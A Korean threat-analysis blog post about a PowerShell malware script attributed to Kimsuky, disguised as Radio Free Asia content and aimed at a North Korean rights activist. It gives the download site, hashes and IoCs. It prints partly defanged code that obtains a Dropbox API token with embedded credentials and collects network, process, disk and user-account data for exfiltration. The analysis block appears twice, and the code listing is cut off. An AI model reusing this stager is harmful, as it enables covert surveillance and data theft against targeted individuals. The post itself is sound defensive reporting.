Kimsuky(김수키)에서 만든 자유 아시아 방송으로 위장 해서 특정 북한 인권운동가 노린 악성코드-log_processlist.ps1(2024.12.02)
Contents
오늘은 imsuky(김수키)에서 만든 자유 아시아 방송으로 위장해서 특정 북한 인권운동가 노린 악성코드 인 log_processlist.ps1(2024.12.02)에 대해 글을 적어보겠습니다.
일단 해당 악성코드는 다음과 같은 사이트에서 유포가 되었습니다.
hxxp://bureopen(.)store/1127
일단 사이트에 접속을 하면 다음과 같은 화면을 볼수가 있으며 first.txt,log_processlist.ps1,sec.txt,start.txt
먼저 log_processlist.ps1부터 보겠습니다.
파일명:log_processlist.ps1
사이즈:2,176 Bytes
MD5:d38a6f924abf59eac2f962dcbff6703c
SHA-1:a26fbfa800e36e43f6e0e5ed7a9dcad7756d83bb
SHA-256:77d5f545661717e31e99fb0880510b02d4cb6746f671135c141b1532b1d87857
log_processlist.ps1 에 포함된 파워셀 코드
$iPath = "$env:TEMP\processlist(.)txt";
$oPath = "$env:TEMP\processlist(.)zip";
$oName = "abc_pl(.)zip";
$svbs = "$env:TEMP\start(.)vbs";
$tokenRequestParams = @{
grant_type = "refresh_token"
refresh_token = "-s1Ryl(F)Ep8QAAAAAAAAAAVWfHhsISNE(x)OVo(7)ath6dwDw8i8wym8E94AYvtlP5U-e";
client_id = "zx7ru0m(b0nqx5ytg"
client_secret = "ni9vqkv0t6p(z)lt2"
}
$qwa = "hxxps://a" (+) "pi(.)dr" + "opboxa" + "pi(.)com/oau" + "th2/to" (+) "ken"
$myttto = Invoke-RestMethod -Uri $qwa -Method Post -Bod(y) $tokenRequestParams
if ([System(.)IO.File]::Exists($svbs)) {
remove-item $(s)vbs -Force -Recurse -ErrorAction SilentlyContinue;
}
if ([System.IO(.)File]::Exists($oPath)) {
remove-item $o(P)ath -Force -Recurse -ErrorAction SilentlyContinue;
}
if ([System.IO(.)File]::Exists($iPath)) {
remove-item $(i)Path -Force -Recurse -ErrorAction SilentlyContinue;
}
Get-NetIPAddress | O(u)t-File -FilePath $iPath -Append;
Get-Process | Out-File (-)FilePath $iPath -Append;
Get-WmiObject -Class Win32(L)ogicalDisk -Filter "Dri(v)eType=3" | Select-Object DeviceID, VolumeName, @{Name="Size(GB)"; Expression={[math]::round($_.Size / 1GB, 2)}}, @{Name="Fre(e)Space(GB)"; Expression={[math]::round($_.FreeSpace / 1GB, 2)}} | Out-File -FilePath $iPath -Append;
G(e)t-LocalUser | Format-List * | Out-File -FilePath $iPath -Append;
Get-(W)miObject -Class Win32_OperatingSystem | Select-Object ProductType | Out-File -FilePath $iPath -Append;
$output(F)ile …
일단 해당 악성코드는 다음과 같은 사이트에서 유포가 되었습니다.
hxxp://bureopen(.)store/1127
일단 사이트에 접속을 하면 다음과 같은 화면을 볼수가 있으며 first.txt,log_processlist.ps1,sec.txt,start.txt
먼저 log_processlist.ps1부터 보겠습니다.
파일명:log_processlist.ps1
사이즈:2,176 Bytes
MD5:d38a6f924abf59eac2f962dcbff6703c
SHA-1:a26fbfa800e36e43f6e0e5ed7a9dcad7756d83bb
SHA-256:77d5f545661717e31e99fb0880510b02d4cb6746f671135c141b1532b1d87857
log_processlist.ps1 에 포함된 파워셀 코드
$iPath = "$env:TEMP\processlist(.)txt";
$oPath = "$env:TEMP\processlist(.)zip";
$oName = "abc_pl(.)zip";
$svbs = "$env:TEMP\start(.)vbs";
$tokenRequestParams = @{
grant_type = "refresh_token"
refresh_token = "-s1Ryl(F)Ep8QAAAAAAAAAAVWfHhsISNE(x)OVo(7)ath6dwDw8i8wym8E94AYvtlP5U-e";
client_id = "zx7ru0m(b0nqx5ytg"
client_secret = "ni9vqkv0t6p(z)lt2"
}
$qwa = "hxxps://a" (+) "pi(.)dr" + "opboxa" + "pi(.)com/oau" + "th2/to" (+) "ken"
$myttto = Invoke-RestMethod -Uri $qwa -Method Post -Bod(y) $tokenRequestParams
if ([System(.)IO.File]::Exists($svbs)) {
remove-item $(s)vbs -Force -Recurse -ErrorAction SilentlyContinue;
}
if ([System.IO(.)File]::Exists($oPath)) {
remove-item $o(P)ath -Force -Recurse -ErrorAction SilentlyContinue;
}
if ([System.IO(.)File]::Exists($iPath)) {
remove-item $(i)Path -Force -Recurse -ErrorAction SilentlyContinue;
}
Get-NetIPAddress | O(u)t-File -FilePath $iPath -Append;
Get-Process | Out-File (-)FilePath $iPath -Append;
Get-WmiObject -Class Win32(L)ogicalDisk -Filter "Dri(v)eType=3" | Select-Object DeviceID, VolumeName, @{Name="Size(GB)"; Expression={[math]::round($_.Size / 1GB, 2)}}, @{Name="Fre(e)Space(GB)"; Expression={[math]::round($_.FreeSpace / 1GB, 2)}} | Out-File -FilePath $iPath -Append;
G(e)t-LocalUser | Format-List * | Out-File -FilePath $iPath -Append;
Get-(W)miObject -Class Win32_OperatingSystem | Select-Object ProductType | Out-File -FilePath $iPath -Append;
$output(F)ile …
IoC
http://bureopen.store/1127
a26fbfa800e36e43f6e0e5ed7a9dcad7756d83bb
77d5f545661717e31e99fb0880510b02d4cb6746f671135c141b1532b1d87857
d38a6f924abf59eac2f962dcbff6703c
a26fbfa800e36e43f6e0e5ed7a9dcad7756d83bb
77d5f545661717e31e99fb0880510b02d4cb6746f671135c141b1532b1d87857
d38a6f924abf59eac2f962dcbff6703c